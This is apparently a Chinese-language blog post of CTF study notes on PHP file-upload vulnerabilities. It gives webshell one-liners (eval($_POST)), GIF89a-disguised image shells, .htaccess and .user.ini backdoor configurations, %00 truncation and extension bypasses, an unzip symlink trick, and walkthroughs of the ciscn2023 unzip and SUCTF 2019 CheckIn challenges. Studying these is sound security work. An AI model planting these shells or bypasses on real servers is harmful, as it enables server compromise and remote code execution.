

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/gc.jpg">
  <link rel="icon" href="/img/gc.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="fru1ts">
  <meta name="keywords" content="fru1ts">
  
    <meta name="description" content="基础 在网站的运营过程中，不可避免地要对网站的某些页面或者内容进行更新，这时便需要使用到网站的文件上传的功能。如果不对被上传的文件进行限制或者限制被绕过，该功能便有可能会被利用于上传可执行文件、脚本到服务器上，进而进一步导致服务器沦陷。 文件上传漏洞是指用户上传了一个可执行脚本文件，并通过此文件获得了执行服器端命令的能力。在大多数情况下，文件上传漏洞一般是指上传 WEB 脚本能够被服务器解析的问">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传">
<meta property="og:url" content="https://fru1ts.github.io/2023/02/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/index.html">
<meta property="og:site_name" content="fru1ts&#39; Blog">
<meta property="og:description" content="基础 在网站的运营过程中，不可避免地要对网站的某些页面或者内容进行更新，这时便需要使用到网站的文件上传的功能。如果不对被上传的文件进行限制或者限制被绕过，该功能便有可能会被利用于上传可执行文件、脚本到服务器上，进而进一步导致服务器沦陷。 文件上传漏洞是指用户上传了一个可执行脚本文件，并通过此文件获得了执行服器端命令的能力。在大多数情况下，文件上传漏洞一般是指上传 WEB 脚本能够被服务器解析的问">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://fru1ts.github.io/2023/02/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/1.png">
<meta property="og:image" content="https://fru1ts.github.io/2023/02/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/2.png">
<meta property="article:published_time" content="2023-02-04T12:26:22.000Z">
<meta property="article:modified_time" content="2023-05-29T06:10:08.641Z">
<meta property="article:author" content="fru1ts">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://fru1ts.github.io/2023/02/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/1.png">
  
  
  
  <title>文件上传 - fru1ts&#39; Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/KaTeX/0.16.2/katex.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/mouse.css">
<link rel="stylesheet" href="/css/scroll.css">
<link rel="stylesheet" href="/css/macpanel.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"fru1ts.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"WEdmoCOkNdSUMsONpu72ngCo-gzGzoHsz","app_key":"PSBkctB8cKrR97yZLNXnJ0nj","server_url":"https://wedmocok.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  

  
    
  



  
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/katex@0.11.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>fru1ts&#39; Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="文件上传"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-02-04 20:26" pubdate>
          February 4, 2023 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.6k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          47 mins
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> views
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">文件上传</h1>
            
              <p class="note note-info">
                
                  
                    Last updated on May 29, 2023 pm
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h3 id="基础"><a class="markdownIt-Anchor" href="#基础"></a> 基础</h3>
<p>在网站的运营过程中，不可避免地要对网站的某些页面或者内容进行更新，这时便需要使用到网站的文件上传的功能。如果不对被上传的文件进行限制或者限制被绕过，该功能便有可能会被利用于上传可执行文件、脚本到服务器上，进而进一步导致服务器沦陷。</p>
<p>文件上传漏洞是指用户上传了一个可执行脚本文件，并通过此文件获得了执行服器端命令的能力。在大多数情况下，文件上传漏洞一般是指上传 WEB 脚本能够被服务器解析的问题，也就是所谓的 webshell 问题。完成这一攻击需要这样几个条件，一是上传的文件能够被 WEB 容器执行，其次用户能从 WEB 上访问这个文件，最后，如果上传的文件被安全检查、格式化、图片压缩等功能改变了内容，则可能导致攻击失败。</p>
<p>PHP的文件上传通常使用move_uploaded_file方法配合$_FILES变量实现，图中的代码直接使用了用户上传文件的文件名作为后端保存的文件名，会导致任意文件上传漏洞</p>
<p>一般简单的文件上传不会给源代码，需要进行黑盒测试，根据回显和经验猜测</p>
<p>难一点可以会有源码（一般可以看网页源码是否藏有提示，或者扫描是否有源文件），根据源码进行白盒测试，绕过限制</p>
<p>进行策略选择时要根据回显文件头判断靶机是Apache还是Ngnix,两者稍有区别</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$file</span>=<span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>];<br><span class="hljs-title function_ invoke__">move_uploaded_file</span>(<span class="hljs-variable">$file</span>[<span class="hljs-string">&#x27;tmp_name&#x27;</span>],<span class="hljs-variable">$file</span>[<span class="hljs-string">&#x27;name&#x27;</span>]);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<h3 id="一句话木马"><a class="markdownIt-Anchor" href="#一句话木马"></a> 一句话木马</h3>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;shell&#x27;</span>]);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">GI89a	#图片幻术头<br>&lt;script language=&#x27;php&#x27;&gt;eval($_POST[&#x27;shell&#x27;]);&lt;/script&gt;<br></code></pre></td></tr></table></figure>
<h3 id="绕过上传检查"><a class="markdownIt-Anchor" href="#绕过上传检查"></a> 绕过上传检查</h3>
<h4 id="前端检查扩展名"><a class="markdownIt-Anchor" href="#前端检查扩展名"></a> 前端检查扩展名</h4>
<p>抓包修改后缀绕过即可，可用后缀名<code>php,php5,php4,php3,php2,html,htm,phtml</code></p>
<h4 id="文件类型检查"><a class="markdownIt-Anchor" href="#文件类型检查"></a> 文件类型检查</h4>
<p>抓包修改 <code>Content-Type</code> 类型，使其符合白名单规则。</p>
<p><code>Content-type=&quot;image/jpeg&quot;||&quot;image/png&quot;||&quot;image/gif&quot;</code></p>
<h4 id="gif89a图片头文件欺骗"><a class="markdownIt-Anchor" href="#gif89a图片头文件欺骗"></a> GIF89a图片头文件欺骗</h4>
<p>一个GIF89a图形文件就是一个根据图形交换格式（GIF）89a版（1989年7 月发行）进行格式化之后的图形。</p>
<p>当服务器有判断文件内容是否是图片时，或者出现<code>exif_imagetype:not image!</code>等，可以在文件最前面加上GIF89a来进行欺骗</p>
<p><code>exif_imagetype()</code> 函数检测文件类型。这个函数是通过检测上传的文件名的文件头来确定文件类型。</p>
<h4 id="被过滤"><a class="markdownIt-Anchor" href="#被过滤"></a> &lt;?被过滤</h4>
<p><code>&lt;script language=&quot;php&quot;&gt;eval($_POST['a']);&lt;/script&gt;</code></p>
<h4 id="上传文件重命名"><a class="markdownIt-Anchor" href="#上传文件重命名"></a> 上传文件重命名</h4>
<p>通常是通过修改文件后缀来绕过黑名单</p>
<p>PHP常见的可执行后缀为php3、php5、phtml、pht等</p>
<p>服务器为windows系统可以尝试&quot;php&quot; 、 “php ： ：$DATA”、&quot;php.&quot;等后缀；文件名不区分大小写，但而in_array区分大小写，所以可以尝试大小写后缀名绕过黑名单</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-variable">$file</span>=<span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>];<br>	<span class="hljs-variable">$name</span>=<span class="hljs-variable">$file</span>[<span class="hljs-string">&#x27;name&#x27;</span>];<br>	<span class="hljs-variable">$ext</span>=<span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-title function_ invoke__">strrchr</span>(<span class="hljs-variable">$name</span>,<span class="hljs-string">&#x27;.&#x27;</span>),<span class="hljs-number">1</span>);<br>	<span class="hljs-variable">$dir</span>=<span class="hljs-string">&#x27;upload/&#x27;</span>;<br><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">in_array</span>(<span class="hljs-variable">$ext</span>,<span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;php&#x27;</span>,<span class="hljs-string">&#x27;asp&#x27;</span>,<span class="hljs-string">&#x27;jsp&#x27;</span>)))&#123;<br>    <span class="hljs-keyword">exit</span>(<span class="hljs-string">&#x27;Forbid!&#x27;</span>);<br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-variable">$saveName</span>=<span class="hljs-variable">$dir</span>.<span class="hljs-title function_ invoke__">time</span>().<span class="hljs-string">&#x27;.&#x27;</span>.<span class="hljs-variable">$ext</span>;<br>    <span class="hljs-title function_ invoke__">move_uploaded_file</span>(<span class="hljs-variable">$file</span>[<span class="hljs-string">&#x27;tmp_name&#x27;</span>],<span class="hljs-variable">$saveName</span>);<br>    <span class="hljs-keyword">exit</span>(<span class="hljs-string">&quot;Success&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>
<h4 id="htaccess文件重写规则"><a class="markdownIt-Anchor" href="#htaccess文件重写规则"></a> .htaccess文件重写规则</h4>
<p>.htaccess是Apache分布式配置文件的默认名称，也可以在Apache主配置文件中通过AccessFileName指令修改分布式配置文件的名称。Apache主配置文件中通过AllowOverride指令配置.htaccess文件中可以 覆 盖 主 配 置 文 件 的 那 些 指 令 ， 在 低 于 2.3.8 的 版 本 中，AllowOverride指令默认为All，在2.3.9及更高版本中默认为None，即在高版本Apache中，默认情况下.htaccess已无任何作用。不过即使AllowOverride为All，为了避免安全问题，也不能覆盖所有主配置文件 中 的 指 令 ， 具 体 可 覆 盖 指 令 可 查 看 ：<a target="_blank" rel="noopener" href="http://httpd.apache.org/docs/2.2/mod/directive-dict.html#Context%E3%80%82%E5%9C%A8%E4%BD%8E%E4%BA%8E2.3.8%E7%89%88%E6%9C%AC%E6%97%B6%EF%BC%8C%E5%9B%A0%E4%B8%BA%E9%BB%98%E8%AE%A4AllowOverride%E4%B8%BAall%EF%BC%8C%E5%8F%AF%E4%BB%A5%E5%B0%9D%E8%AF%95%E4%B8%8A%E4%BC%A0.htaccess%E6%96%87%E4%BB%B6%E4%BF%AE%E6%94%B9%E9%83%A8%E5%88%86%E9%85%8D%E7%BD%AE%EF%BC%8C%E4%BD%BF%E7%94%A8SetHandler%E6%8C%87%E4%BB%A4%E4%BD%BFphp%E8%A7%A3%E6%9E%90%E6%8C%87%E5%AE%9A%E6%96%87%E4%BB%B6">http://httpd.apache.org/docs/2.2/mod/directive-dict.html#Context。在低于2.3.8版本时，因为默认AllowOverride为all，可以尝试上传.htaccess文件修改部分配置，使用SetHandler指令使php解析指定文件</a></p>
<p>该方法只适用于apache服务器当只允许上传图片时，利用.htaccess重写文件规则，使服务器将图片当成php文件解析</p>
<p>这时只要上传图片木马就可以蚁剑连接了</p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs applescript">.htaccess<br>GIF89a<br>&lt;FilesMatch <span class="hljs-string">&quot;htmleval&quot;</span>&gt;<br>SetHandler <span class="hljs-built_in">application</span>/x-httpd-php<br>&lt;/FilesMatch&gt;<br><br>当上面报错时，直接用下面这一句尝试<br>SetHandler <span class="hljs-built_in">application</span>/x-httpd-php<br></code></pre></td></tr></table></figure>
<h4 id="上传userini文件绕过黑名单"><a class="markdownIt-Anchor" href="#上传userini文件绕过黑名单"></a> 上传.user.ini文件绕过黑名单</h4>
<h5 id="userini文件的介绍"><a class="markdownIt-Anchor" href="#userini文件的介绍"></a> .user.ini文件的介绍</h5>
<p>官方解释：</p>
<p>PHP 支持基于每个目录的 INI 文件配置。此类文件 <em>仅</em>被 <code>CGI／FastCGI SAPI</code> 处理。此功能使得 <code>PECL</code> 的 <code>htscanner </code>扩展作废。如果你的 PHP 以模块化运行在 Apache 里，则用 .htaccess 文件有同样效果。</p>
<p>除了主 php.ini 之外，PHP 还会在每个目录下扫描 INI 文件，从被执行的 PHP 文件所在目录开始一直上升到 web 根目录（[$_SERVER<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/reserved.variables.server.php">’DOCUMENT_ROOT’]</a> 所指定的）。如果被执行的 PHP 文件在 web 根目录之外，则只扫描该目录。</p>
<p>在 .user.ini 风格的 INI 文件中只有具有 <strong><code>PHP_INI_PERDIR</code></strong> 和 <strong><code>PHP_INI_USER</code></strong> 模式的 INI 设置可被识别。</p>
<p>两个新的 INI 指令， <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/ini.core.php#ini.user-ini.filename">user_ini.filename</a> 和 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/ini.core.php#ini.user-ini.cache-ttl">user_ini.cache_ttl</a> 控制着用户 INI 文件的使用。</p>
<p><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/ini.core.php#ini.user-ini.filename">user_ini.filename</a> 设定了 PHP 会在每个目录下搜寻的文件名；如果设定为空字符串则 PHP 不会搜寻。默认值是 <code>.user.ini</code>。</p>
<p><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/ini.core.php#ini.user-ini.cache-ttl">user_ini.cache_ttl</a> 控制着重新读取用户 INI 文件的间隔时间。默认是 300 秒（5 分钟）。</p>
<img src="/2023/02/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/1.png" srcset="/img/loading.gif" lazyload class="">
<p>和<code>php.ini</code>不同的是，<code>.user.ini</code>是一个能被动态加载的ini文件。也就是说我修改了<code>.user.ini</code>后，不需要重启服务器中间件，只需要等待<code>user_ini.cache_ttl</code>所设置的时间（默认为300秒），即可被重新加载。</p>
<p>利用.user.ini来构造后门需要用到这两个有意思的配置项</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs angelscript"><span class="hljs-built_in">auto</span>_append_file <span class="hljs-built_in">string</span><br>指定在主文件之后自动解析的文件名。included 该文件像是用 require 函数调用的一样，因此使用了 include_path。<br>特殊值 none 禁用 <span class="hljs-built_in">auto</span>-prepending。<br></code></pre></td></tr></table></figure>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs angelscript"><span class="hljs-built_in">auto</span>_prepend_file <span class="hljs-built_in">string</span><br>指定在主文件之前自动解析的文件名。included 该文件像是用 require 函数调用的一样，因此使用了 include_path。<br>特殊值 none 禁用 <span class="hljs-built_in">auto</span>-prepending。<br></code></pre></td></tr></table></figure>
<p>因此可以在.user.ini文件中写</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">auto_prepend_file</span>=<span class="hljs-number">1</span>.gif<br></code></pre></td></tr></table></figure>
<p>再上传一个木马文件<code>1.gif</code>,这后访问主文件index.php就会自动解析1.gif了</p>
<h4 id="服务端添加后缀"><a class="markdownIt-Anchor" href="#服务端添加后缀"></a> 服务端添加后缀</h4>
<p>后端先获取用户上传文件的文件名，再根据文件名获得文件的实际后缀，通过后缀的白名单校验后，最终再保存文件</p>
<p>这种情况可以尝试用<code>%00</code>截断：如<code>x.php\00.jpg</code>截断后为<code>x.php</code></p>
<p>但文件存储的路径一部分可控时，也可以用%00截断绕过，如</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$img_path</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;save_path&#x27;</span>].<span class="hljs-string">&quot;/&quot;</span>.<span class="hljs-title function_ invoke__">rand</span>(<span class="hljs-number">10</span>, <span class="hljs-number">99</span>).<span class="hljs-title function_ invoke__">date</span>(<span class="hljs-string">&quot;YmdHis&quot;</span>).<span class="hljs-string">&quot;.&quot;</span>.<span class="hljs-variable">$file_ext</span>;<br></code></pre></td></tr></table></figure>
<p>save_path加上%00截断后后面随机的名称将被截断，我们将可以控制存储的路径，save_path=upload/1.php%00</p>
<p>注：当url中的参数是通过GET方式获取时，%00会被自动解码。而当参数是通过POST方式获取时，是不会自动解码的，也就是说%00只会原样被当成字符串来输出。所以通过POST方式请求此类参数的时候，我们需要手动将它的十六进制改写为0x00。</p>
<p>但是，使用<code>$_FILES['name']</code>是<code>%00</code>截断无效，因为PHP在 注 册 $_FILES 全 局 变 量 时 已 经 产 生 了 截 断 。而注册到$_FILES[‘name’]的变量值为x.php。</p>
<h4 id="服务端扩展名检测"><a class="markdownIt-Anchor" href="#服务端扩展名检测"></a> 服务端扩展名检测</h4>
<p>利用解析漏洞</p>
<h5 id="apache-解析"><a class="markdownIt-Anchor" href="#apache-解析"></a> Apache 解析</h5>
<p>Apache 对后缀解析是从右向左的</p>
<p><code>phpshell.php.rar.rar.rar.rar</code> 因为 Apache 不认识 <code>.rar</code> 这个文件类型，所以会一直遍历后缀到 <code>.php</code>，然后认为这是一个 PHP 文件。</p>
<h3 id="uzip命令导致文件上传"><a class="markdownIt-Anchor" href="#uzip命令导致文件上传"></a> uzip命令导致文件上传</h3>
<p><code>unzip()</code>存在软链接攻击</p>
<p>可以通过上传软链接压缩包实现RCE</p>
<h4 id="ciscn2023初赛unzip"><a class="markdownIt-Anchor" href="#ciscn2023初赛unzip"></a> ciscn2023初赛unzip</h4>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><br><span class="hljs-variable">$finfo</span> = <span class="hljs-title function_ invoke__">finfo_open</span>(FILEINFO_MIME_TYPE);<br><span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">finfo_file</span>(<span class="hljs-variable">$finfo</span>, <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&quot;file&quot;</span>][<span class="hljs-string">&quot;tmp_name&quot;</span>]) === <span class="hljs-string">&#x27;application/zip&#x27;</span>)&#123;<br>        <span class="hljs-title function_ invoke__">exec</span>(<span class="hljs-string">&#x27;cd /tmp &amp;&amp; unzip -o &#x27;</span> . <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&quot;file&quot;</span>][<span class="hljs-string">&quot;tmp_name&quot;</span>]);  <span class="hljs-comment">#有-o允许文件覆盖</span><br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&quot;file&quot;</span>][<span class="hljs-string">&quot;tmp_name&quot;</span>];<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>];<br>&#125;;<br>&gt;?<br></code></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs bash">先构造一个指向 /var/www/html 的软连接：<br><span class="hljs-built_in">ln</span> -s /var/www/html <span class="hljs-built_in">test</span><br>zip --symlinks test.zip ./*<br>再构造一个木马在<span class="hljs-built_in">test</span>目录下<br><span class="hljs-built_in">mkdir</span> <span class="hljs-built_in">test</span><br><span class="hljs-built_in">cd</span> <span class="hljs-built_in">test</span><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;&lt;?php eval(<span class="hljs-variable">$_POST</span>[cmd]);?&gt;&quot;</span> &gt; cmd.php<br><span class="hljs-built_in">cd</span> ..<br>zip -r test1.zip ./*<br>依次上传test.zip,test1.zip<br>这样就可以使木马cmd.php存在/var/www/html/下<br>蚁剑连接获得flag<br></code></pre></td></tr></table></figure>
<h2 id="suctf-2019checkin-1"><a class="markdownIt-Anchor" href="#suctf-2019checkin-1"></a> [SUCTF 2019]CheckIn 1</h2>
<p>这个题上来直接是文件上传入口，什么提示都没有，那就直接进行黑盒测试</p>
<p>先传.php文件，不行再修改成各种后缀，发现只能是上传图片</p>
<p>文件还不能含有<code>&lt;?</code>,那就用<code>&lt;script language='php'&gt;eval($_POST['shell']);&lt;/script&gt;</code>代替</p>
<p>再用图片上传木马，提示<code>exif_imagetype:not image!</code>,用GIF89a文件头绕过</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs xml">#htmleval.jpg<br>GIF89a<br><span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">language</span>=<span class="hljs-string">&#x27;php&#x27;</span>&gt;</span><span class="language-javascript"><span class="hljs-built_in">eval</span>($_POST[<span class="hljs-string">&#x27;shell&#x27;</span>]);</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br></code></pre></td></tr></table></figure>
<p>但是图片能上传了却不能让图片解析？</p>
<p>发现相应头有<code>Server: openresty</code>，说明服务器是<code>Ngnix</code>，这个修改文件规则要通过.user.ini</p>
<p>加上上传的图片文件路径下有index.php主文件，更加确定用.user.ini</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-comment">#.user.ini</span><br><span class="hljs-attr">auto_prepend_file</span>=htmleval.jpg<br></code></pre></td></tr></table></figure>
<p>之后访问<a target="_blank" rel="noopener" href="http://f816e0dd-cad1-485b-8e49-18ede07d9157.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php">http://f816e0dd-cad1-485b-8e49-18ede07d9157.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php</a> 发现有解析木马文件了</p>
<p>直接用蚁剑连接</p>
<img src="/2023/02/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/2.png" srcset="/img/loading.gif" lazyload class="">
<h3 id="参考资料"><a class="markdownIt-Anchor" href="#参考资料"></a> <em>参考资料</em></h3>
<p><em><a target="_blank" rel="noopener" href="https://ctf-wiki.org/web/php/php/#_4">https://ctf-wiki.org/web/php/php/#_4</a></em></p>
<p><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/configuration.file.per-user.php">https://www.php.net/manual/zh/configuration.file.per-user.php</a></p>
<p><a target="_blank" rel="noopener" href="https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html">https://wooyun.js.org/drops/user.ini文件构成的PHP后门.html</a></p>
